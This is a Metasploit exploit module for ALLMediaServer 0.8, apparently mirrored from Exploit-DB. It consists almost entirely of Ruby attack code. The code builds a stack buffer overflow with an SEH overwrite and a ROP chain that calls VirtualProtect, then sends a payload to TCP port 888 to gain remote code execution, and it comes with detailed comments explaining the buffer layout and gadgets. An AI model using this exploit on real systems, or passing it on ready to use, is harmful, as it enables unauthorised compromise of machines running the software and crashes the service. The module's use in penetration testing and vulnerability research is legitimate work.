ALLMediaServer 0.8 – Remote Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2012-07-16
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19857/
  • ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
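    # ALLMediaServer 0.8 (TCP/888) SEH-overwrite exploit.
    #
    # Request layout built by #exploit, in send order:
    #
    #   [ OffsetRop bytes random ][ ROP chain ][ jmp $+jmp ][ pad ][ SEH record @ Offset ][ payload ]
    #
    # Intended flow (the gadget semantics come from the mona-style comments
    # on the chain, not from anything this module can verify at run time):
    # the overflow replaces the SEH handler with target['Ret'], an
    # "ADD ESP,6CC # POP # POP # POP # RET" gadget that lifts ESP back into
    # our buffer so the RET lands somewhere in the ROP-NOP sled placed at
    # OffsetRop. The chain then loads VirtualProtect's address, dwSize 0x600,
    # flNewProtect 0x40 (presumably PAGE_EXECUTE_READWRITE) and a writable
    # lpflOldProtect, and PUSHAD # RETN invokes it with a "call esp" gadget
    # as the return address. "call esp" executes the 0x90909090 NOPs that
    # PUSHAD left on the stack, falls through into the "jmp $+jmp" stub that
    # directly follows the chain, and that jump skips the padding and the SEH
    # record to reach payload.encoded.
    #
    # For both targets 'jmp' == (Offset + 8) - (OffsetRop + 120), i.e. the
    # chain is 120 bytes (30 dwords) and the layout assumes an 8-byte SEH
    # record at Offset; keep the three values in step if any is changed.
    #
    # NOTE(review): every address below is absolute. They only work if the
    # DLLs they come from load at the base mona saw (no ASLR rebasing); on a
    # rebased host the service crashes instead of yielding a session, and
    # ExitFunction 'process' means a successful payload also ends the server.
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = NormalRanking

    	include Msf::Exploit::Remote::Tcp
    	include Msf::Exploit::Seh

    	# Module metadata. Per-target keys:
    	#   'Ret'       - SEH handler overwrite (the ADD ESP / POP x3 / RET gadget)
    	#   'OffsetRop' - bytes of filler before the ROP chain
    	#   'jmp'       - forward displacement of the "jmp $+N" stub to the payload
    	#   'Offset'    - byte offset at which the SEH record is written
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'ALLMediaServer 0.8 Buffer Overflow',
    			'Description'=> %q{
    				This module exploits a stack buffer overflow in ALLMediaServer 0.8.
    				The vulnerability is caused due to a boundary error within the
    				handling of HTTP request.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' =>
    				[
    					'motaz reda <motazkhodair[at]gmail.com>',	# Original discovery
    					'modpr0be <tom[at]spentera.com>',	# Metasploit module
    					'juan vazquez' # More improvement
    				],
    			'References' =>
    				[
    					[ 'EDB', '19625' ]
    				],
    			'DefaultOptions' =>
    				{
    					'ExitFunction' => 'process', #none/process/thread/seh
    				},
    			'Platform' => 'win',
    			'Payload'=>
    				{
    					'BadChars' => "",
    					'Space' => 660,
    					# The sled is done in ROP (nops(true, 12)); a NOP sled in front of
    					# the payload would only eat into the 0x600 bytes VirtualProtect covers.
    					'DisableNops' => true
    				},

    			'Targets'=>
    				[
    					[ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
    						{
    							'Ret' =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll (sic; likely avcodec-53.dll, verify)
    							'OffsetRop' =>	696,
    							'jmp' =>	264,	# 1080 - (696 + 120)
    							'Offset'=>	1072
    						}
    					],
    					[ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
    						{
    							'Ret' =>	0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll (sic; likely avcodec-53.dll, verify)
    							'OffsetRop' =>	332,
    							'jmp' =>	628,	# 1080 - (332 + 120)
    							'Offset'=>	1072
    						}
    					],
    				],
    			'Privileged' => false,
    			'DisclosureDate' => 'Jul 04 2012',
    			'DefaultTarget'=> 1))

    		register_options([Opt::RPORT(888)], self.class)

    	end

    	# n copies of ONE random alphanumeric dword (the value is drawn once and
    	# repeated, not re-drawn per element). Used where a gadget pops a register
    	# that nothing downstream reads.
    	def junk(n=1)
    		# "V" (little-endian) matches the pack("V*") in #exploit, so the bytes
    		# on the wire are the random text itself regardless of host endianness.
    		return [rand_text_alpha(4).unpack("V")[0]] * n
    	end

    	# n sled dwords: with rop=true the address of a bare RETN gadget (a ROP
    	# NOP, safe to land on at any dword boundary); otherwise 0x90909090,
    	# four x86 NOPs that are executed once "call esp" runs the stack.
    	def nops(rop=false, n=1)
    		return rop ? [0x665a0aa1] * n : [0x90909090] * n
    	end

    	# Assemble a snippet of IA-32 code to raw bytes.
    	def asm(code)
    		Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
    	end

    	# Build the request described in the class comment and send it.
    	# Raises ArgumentError when the target offsets cannot produce the
    	# documented layout (the original silently emitted a corrupt buffer in
    	# that case, since rand_text with a negative length adds nothing).
    	def exploit
    		# VirtualProtect chain generated with mona; register roles per the
    		# gadget comments. Order is load-bearing: PUSHAD pushes
    		# EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI and the RETN after it consumes them
    		# from EDI upward.
    		chain = [
    			nops(true, 12),#ROP NOP sled (RETN gadgets)
    			0x65f6faa7,# POP EAX # RETN
    			0x671ee4e0,# ptr to &VirtualProtect()
    			0x6ac1ccb4,# MOV EAX,DWORD PTR DS:[EAX] # RETN (dereference IAT slot)
    			0x667ceedf,# PUSH EAX # POP ESI # POP EDI # RETN (ESI = VirtualProtect)
    			junk,# consumed by the POP EDI above
    			0x65f5f09d,# POP EBP # RETN
    			0x65f9830d,# & call esp (EBP = VirtualProtect's return address)
    			0x6ac1c1d5,# POP EBX # RETN
    			0x00000600,# 0x00000600 -> ebx (dwSize)
    			0x6672a1e2,# POP EDX # RETN
    			0x00000040,# 0x00000040 -> edx (flNewProtect)
    			0x665a09df,# POP ECX # RETN
    			0x6ad58a3d,# &Writable location (lpflOldProtect)
    			0x6ac7a771,# POP EDI # RETN
    			nops(true),# RETN (ROP NOP) -> edi, first thing popped after PUSHAD
    			0x6682f9f4,# POP EAX # RETN
    			nops,# 0x90909090 -> eax, executed by "call esp" after VirtualProtect returns
    			0x663dcbd2 # PUSHAD # RETN
    		].flatten.pack("V*")

    		# ROP stub: filler, chain, then the jump that hops over the SEH record.
    		stub = rand_text(target['OffsetRop'])	#junk
    		stub << chain
    		stub << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload

    		# Checked before connecting: a chain that overruns Offset would
    		# overwrite the SEH record with gadget bytes and the padding below
    		# would silently come out empty.
    		if target['Offset'] < stub.length
    			raise ArgumentError, "ROP stub (#{stub.length} bytes) does not fit below the SEH record at offset #{target['Offset']}"
    		end

    		buffer = stub
    		buffer << rand_text(target['Offset'] - buffer.length)
    		buffer << generate_seh_record(target.ret)
    		buffer << payload.encoded

    		connect
    		begin
    			print_status("Sending payload to ALLMediaServer on #{target.name}...")
    			sock.put(buffer)
    		ensure
    			# Always release the socket, even if the write raises.
    			disconnect
    		end

    	end
    end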